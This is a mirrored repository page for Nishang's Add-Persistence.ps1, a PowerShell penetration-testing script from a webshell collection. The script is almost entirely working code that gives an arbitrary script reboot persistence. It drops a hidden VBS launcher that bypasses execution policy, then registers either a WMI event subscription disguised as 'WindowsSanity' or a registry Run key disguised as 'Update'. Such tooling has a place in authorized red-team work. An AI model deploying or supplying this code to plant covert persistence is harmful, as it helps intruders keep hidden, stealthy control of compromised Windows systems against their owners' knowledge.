Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-23 03:33:03 +00:00
Code Issues Projects Releases Packages Wiki Activity
webshell/aspx/nishang/Utility/Add-Persistence.ps1
tennc 300ccb3c8d update Antak-WebShell aspx 
Antak-WebShell
2014-07-30 17:50:54 +08:00

62 lines
2.8 KiB
PowerShell
Raw Blame History

<#
.SYNOPSIS
Nishang script which could be used to add reboot persistence to a powershell script.
.DESCRIPTION
This script accepts path of a script to which reboot persistence is to be added.
The target sript is dropped into the user's temp directory and either WMI permanent event consumer or Registry changes is used (based on privs) for persistence.
Persistence created using this script could be cleaned by using the Remove-Persistence.ps1 script in Nishang.
.PARAMETER ScriptPath
Path of the script to which persistence is to be added.
.Example
PS > Add-Persistence -ScriptPath C:\script.ps1
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
#>
function Add-Persistence
{
[CmdletBinding()] Param(
[Parameter(Mandatory = $True)]
[String]
$ScriptPath
)
$body = Get-Content $ScriptPath
$modulename = $script:MyInvocation.MyCommand.Name
$name = "persist.vbs"
Out-File -InputObject $body -Force $env:TEMP\$modulename
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
{
$scriptpath = $env:TEMP
$scriptFileName = "$scriptpath\$name"
$filterNS = "root\cimv2"
$wmiNS = "root\subscription"
$query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
"@
$filterName = "WindowsSanity"
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
}
else
{
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
}
Reference in a new issue View git blame Copy permalink